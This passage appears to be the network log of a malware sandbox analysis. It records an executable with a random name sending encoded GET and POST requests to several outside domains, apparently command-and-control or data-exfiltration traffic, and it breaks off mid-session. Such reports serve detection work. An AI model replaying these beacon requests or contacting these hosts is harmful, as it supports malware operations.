                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-E
                                                              Nov 24, 2024 08:36:13.959383965 CET401INData Raw: 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1
                                                              Data Ascii: K/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4Orr


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.749992104.21.88.13980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:15.282082081 CET465OUTGET /ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:16.535341978 CET1236INHTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:16 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NkmBSC1s5%2F4%2BdFkxwi5lfTkFrbdrxc%2FbcAg%2F3z3zV%2BJHrQDuJueHbVWctYsazP9vJI0CGvWcj%2FaotNYYVUuVPg52zX4WvcklN2qmTDocteTIlpxneu3%2BZcJxqgaCOLhHmL1lfMbNRHyT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77ba1d3c417c8a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=465&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 34 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                                              Data Ascii: 4e2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                                                              Nov 24, 2024 08:36:16.535377979 CET910INData Raw: 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20
                                                              Data Ascii: height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; l


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.749993185.106.208.380520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:22.399091005 CET719OUTPOST /oeev/ HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.holytur.net
                                                              Referer: http://www.holytur.net/oeev/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 66 73 71 64 47 79 56 43 6d 30 62 6e 6e 61 75 56 61 61 55 65 45 39 38 48 54 52 66 62 53 49 6e 6c 72 47 6c 6d 70 6a 48 46 35 63 6f 4e 46 4b 46 4b 45 74 75 36 72 50 33 2b 53 35 79 76 58 41 4a 68 4e 5a 32 31 73 2b 47 6d 6e 67 57 5a 44 4a 51 59 47 66 48 55 52 43 77 37 6b 67 57 73 70 4e 44 59 63 4d 72 64 47 6b 4b 70 57 2f 49 76 52 62 4f 65 47 33 6b 59 57 57 4d 41 71 44 59 35 5a 49 51 64 37 7a 43 72 4e 70 30 76 44 32 31 44 36 45 44 6a 4b 78 31 73 2f 69 4a 4e 6b 78 49 66 37 6f 73 47 31 43 4f 79 37 73 6b 68 38 69 4d 6f 42 39 36 65 37 52 7a 58 78 35 45 64 7a 62 7a 44 6a 30 75 56 42 49 4a 77 73 41 3d 3d
                                                              Data Ascii: jp30l4Dh=1DLd8aqplq3ofsqdGyVCm0bnnauVaaUeE98HTRfbSInlrGlmpjHF5coNFKFKEtu6rP3+S5yvXAJhNZ21s+GmngWZDJQYGfHURCw7kgWspNDYcMrdGkKpW/IvRbOeG3kYWWMAqDY5ZIQd7zCrNp0vD21D6EDjKx1s/iJNkxIf7osG1COy7skh8iMoB96e7RzXx5EdzbzDj0uVBIJwsA==
                                                              Nov 24, 2024 08:36:23.848117113 CET367INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.749994185.106.208.380520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:25.075448036 CET739OUTPOST /oeev/ HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.holytur.net
                                                              Referer: http://www.holytur.net/oeev/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 5a 4f 2b 64 42 54 56 43 79 6b 62 34 69 61 75 56 44 4b 55 61 45 39 41 48 54 51 71 44 53 2b 33 6c 72 69 68 6d 6f 69 48 46 30 38 6f 4e 57 4b 46 50 61 64 75 78 72 50 37 41 53 38 53 76 58 41 4e 68 4e 59 47 31 73 4a 61 6c 6d 77 57 66 4f 70 51 4e 4c 2f 48 55 52 43 77 37 6b 67 43 4b 70 4e 37 59 64 38 37 64 47 47 6a 62 63 66 49 73 63 4c 4f 65 51 33 6b 55 57 57 4d 79 71 43 46 63 5a 4b 6f 64 37 79 53 72 4e 38 55 73 4b 32 31 46 30 6b 43 43 48 78 34 77 37 57 4e 6a 37 67 42 4c 2b 4a 6f 61 35 55 50 51 68 4f 6f 4e 69 7a 30 54 46 2f 65 6f 73 33 75 69 7a 34 41 46 2b 35 48 69 38 44 4c 2f 4d 61 6f 30 36 77 66 56 36 4f 54 4e 6a 52 61 4e 30 37 54 7a 6b 66 6f 6b 64 38 59 3d
                                                              Data Ascii: jp30l4Dh=1DLd8aqplq3oZO+dBTVCykb4iauVDKUaE9AHTQqDS+3lrihmoiHF08oNWKFPaduxrP7AS8SvXANhNYG1sJalmwWfOpQNL/HURCw7kgCKpN7Yd87dGGjbcfIscLOeQ3kUWWMyqCFcZKod7ySrN8UsK21F0kCCHx4w7WNj7gBL+Joa5UPQhOoNiz0TF/eos3uiz4AF+5Hi8DL/Mao06wfV6OTNjRaN07Tzkfokd8Y=
                                                              Nov 24, 2024 08:36:26.596673012 CET367INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.749995185.106.208.380520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:27.740742922 CET1752OUTPOST /oeev/ HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.holytur.net
                                                              Referer: http://www.holytur.net/oeev/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 5a 4f 2b 64 42 54 56 43 79 6b 62 34 69 61 75 56 44 4b 55 61 45 39 41 48 54 51 71 44 53 2b 2f 6c 72 52 70 6d 70 46 37 46 31 38 6f 4e 56 4b 46 4f 61 64 75 73 72 4c 58 45 53 38 58 61 58 43 46 68 4e 37 4f 31 71 39 75 6c 73 77 57 66 53 5a 51 5a 47 66 47 4f 52 43 68 54 6b 67 53 4b 70 4e 37 59 64 2f 54 64 53 45 4c 62 61 66 49 76 52 62 4f 53 47 33 6b 77 57 57 55 49 71 43 52 6d 5a 37 49 64 37 54 69 72 4b 50 38 73 49 57 31 48 33 6b 43 67 48 78 30 5a 37 58 6c 76 37 67 30 51 2b 4c 6f 61 36 69 2b 64 38 73 78 57 38 77 63 70 50 75 75 34 72 48 50 56 36 35 41 6c 39 6f 54 47 38 45 2f 68 45 59 4d 47 2b 57 53 4b 34 65 62 68 71 7a 36 63 38 62 33 38 77 4f 41 4d 4d 4d 76 4e 6a 31 64 6e 38 63 5a 45 5a 47 37 71 6c 54 52 31 4b 57 77 58 6d 68 68 36 4d 74 44 41 34 58 55 55 44 39 6d 46 6d 54 35 62 6b 4c 4f 2b 33 4f 54 58 4c 46 37 70 38 68 67 66 63 63 64 4b 70 65 4a 31 68 79 39 77 6f 59 34 6f 34 7a 4f 67 47 39 41 37 2b 30 54 69 54 32 6e 56 35 61 74 4b 4d 41 4d 4e 63 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh=1DLd8aqplq3oZO+dBTVCykb4iauVDKUaE9AHTQqDS+/lrRpmpF7F18oNVKFOadusrLXES8XaXCFhN7O1q9ulswWfSZQZGfGORChTkgSKpN7Yd/TdSELbafIvRbOSG3kwWWUIqCRmZ7Id7TirKP8sIW1H3kCgHx0Z7Xlv7g0Q+Loa6i+d8sxW8wcpPuu4rHPV65Al9oTG8E/hEYMG+WSK4ebhqz6c8b38wOAMMMvNj1dn8cZEZG7qlTR1KWwXmhh6MtDA4XUUD9mFmT5bkLO+3OTXLF7p8hgfccdKpeJ1hy9woY4o4zOgG9A7+0TiT2nV5atKMAMNcrGZ4VIppMSdbKKdOP1Xe5JzMYsIZrNBfKSxLVWsk/AYx0hqGDAaWVuzot7HswUgmKZ1ZsA/zImNHi+qqGCgDxBKUB6WnwZscaAoiKNxSpFp9OVM+A9BhroBEmzWLg4+fiNCjzAtEHEdH7MfwZFY+d73nEt1hQvQbdtBCBBtOSLzIuzX7TcajJBNDNc5mREKMVoeUz/Wg66rLqMV73nCDjthwd2KgP1B9v+2s9jaDP1b2gtesfAf0/HD6H95X3v1i+SIPVgSHBfRkTgFX+cn9QHO/We9Eq7oC2J1AYTEvBAtKNaZgclEs/jsGGNO5JIrw2aN+5L8hhUdAD+NvGfP2x5o6sHeLlprwsrr04+N7o5cHDhWG8SRXBPtZimu3IPFS7uIvnV301m5humcP0m2rVfmFE3IGf/vsiEZbBBj7I/9nmzlsx6q9ZnbnH7LhT3JDBOoMlmWolOhfHwIISNKay9GQlkPnWAAMWkYAqrrxwZoIq4KSMEpsyD9lDmoNfOQMvw0wu7o8cbyhlGU77CBT/PbbdWNlPxK/M1uU/odfwyABPY/3mAPyj80s5tDOcEo/pUTIsf4PbaC55jcwbrBpe0d1K5JAwg64ZvYkiv6qmEldY1PhE3ibFeS3mCWh28x93NChoms4loaTJo01EDnigdqkwY1ipOwMew [TRUNCATED]
                                                              Nov 24, 2024 08:36:29.126285076 CET367INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.749996185.106.208.380520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:30.421518087 CET458OUTGET /oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8s HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:31.806364059 CET706INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:30 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 548
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.74999713.248.169.4880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:37.375343084 CET716OUTPOST /qp0h/ HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.lirio.shop
                                                              Referer: http://www.lirio.shop/qp0h/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 67 69 6c 78 2f 6c 52 5a 62 31 65 78 41 70 4d 75 58 76 78 61 61 39 68 77 30 45 79 66 77 31 48 2f 36 2f 6b 37 39 43 6f 56 62 44 57 54 35 4d 54 6b 6e 67 59 52 79 65 77 39 48 32 77 77 65 49 4e 64 72 58 59 68 4a 6f 79 79 48 64 72 72 56 2b 73 6d 56 31 39 67 6c 66 39 58 47 46 66 2b 44 69 59 47 54 69 39 4b 6a 33 35 4b 61 44 6c 44 2f 30 64 6f 71 58 68 67 62 7a 46 6c 44 63 59 4d 33 47 59 75 67 46 71 37 79 38 75 77 38 38 63 79 50 30 4f 76 49 48 68 74 54 43 6a 76 6b 33 32 50 65 71 2b 41 2b 7a 50 72 4d 4f 6d 7a 55 6d 2f 75 56 4a 65 34 46 4b 4f 32 63 33 31 72 55 73 78 66 4c 44 44 74 72 50 4a 33 4f 51 3d 3d
                                                              Data Ascii: jp30l4Dh=CWi2LxdIHyDkgilx/lRZb1exApMuXvxaa9hw0Eyfw1H/6/k79CoVbDWT5MTkngYRyew9H2wweINdrXYhJoyyHdrrV+smV19glf9XGFf+DiYGTi9Kj35KaDlD/0doqXhgbzFlDcYM3GYugFq7y8uw88cyP0OvIHhtTCjvk32Peq+A+zPrMOmzUm/uVJe4FKO2c31rUsxfLDDtrPJ3OQ==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.74999813.248.169.4880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:36:40.039668083 CET736OUTPOST /qp0h/ HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.lirio.shop
                                                              Referer: http://www.lirio.shop/qp0h/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 69 43 31 78 39 47 35 5a 63 56 65 2b 4b 4a 4d 75 65 50 78 65 61 39 64 77 30 47 66 59 77 47 76 2f 2f 74 73 37 38 41 41 56 61 44 57 54 67 38 54 38 71 41 59 67 79 65 73 66 48 79 34 77 65 49 5a 64 72 56 51 68 4a 35 79 39 48 4e 72 70 64 65 73 6b 66 56 39 67 6c 66 39 58 47 47 69 32 44 69 51 47 54 78 6c 4b 73 30 68 4c 5a 44 6c 43 38 30 64 6f 67 33 67 70 62 7a 46 4c 44 5a 35 5a 33 45 51 75 67 46 61 37 31 74 75 7a 32 38 63 77 53 45 50 75 4c 58 45 43 58 52 44 72 38 30 47 68 48 4b 4c 6d 79 6c 4f 4a 57 73 71 66 4b 33 48 56 52 4c 36 4f 53 73 54 44 65 32 78 7a 5a 4f 46 2b 55 30 6d 48 6d 64 6f 7a 59 6b 49 36 31 65 49 4f 77 77 34 78 51 43 34 63 39 42 74 6c 34 42 59 3d
                                                              Data Ascii: jp30l4Dh=CWi2LxdIHyDkiC1x9G5ZcVe+KJMuePxea9dw0GfYwGv//ts78AAVaDWTg8T8qAYgyesfHy4weIZdrVQhJ5y9HNrpdeskfV9glf9XGGi2DiQGTxlKs0hLZDlC80dog3gpbzFLDZ5Z3EQugFa71tuz28cwSEPuLXECXRDr80GhHKLmylOJWsqfK3HVRL6OSsTDe2xzZOF+U0mHmdozYkI61eIOww4xQC4c9Btl4BY=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.74999913.248.169.4880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
